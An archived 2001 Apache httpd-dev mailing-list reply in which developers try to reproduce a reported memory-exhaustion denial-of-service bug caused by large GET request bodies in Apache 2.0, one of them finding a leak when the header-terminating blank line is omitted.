httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Aaron Bannert <>
Subject Re: More Dos -- Large GETs
Date Wed, 31 Oct 2001 01:55:42 GMT
On Tue, Oct 30, 2001 at 03:48:48PM -0800, Jon Travis wrote:
> On Tue, Oct 30, 2001 at 03:46:14PM -0500, Jeff Trawick wrote:
> > Jon Travis <> writes:
> > 
> > > It's possible to make Apache eat up all available memory on a system
> > > by sending a GET with a large Content-Length (like several hundred MB),
> > > and then sending that content.  This is as of HEAD about 5 minutes ago.
> > 
> > Maybe the problem is your client implementation?  You didn't by any
> > chance get a mongo buffer to hold the request body did you?
> > 
> > I just sent a GET w/ 500,000,000-byte body and didn't suffer.
> > 
> > strace showed that server process was pulling in 8K at a time...  lots
> > of CPU between client and server but no swap fest.
> Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> times.  It was the httpd process which was growing, not my test program.
> This was with Apache 2.0 HEAD, BTW, and 100% reproducable for me.

I am unable to reproduce this with valid HTTP request syntax and
arbitrarily large bodies (at least against /index.html.en). The server
grows up to an apparent limit.

However, if I omit the extra CRLF at the end of the headers (effectivly
fusing this humongous body with the headers) I _DO_ see a massive
memory leak.

Email me privatly if you'd like the test client program I whipped together.


View raw message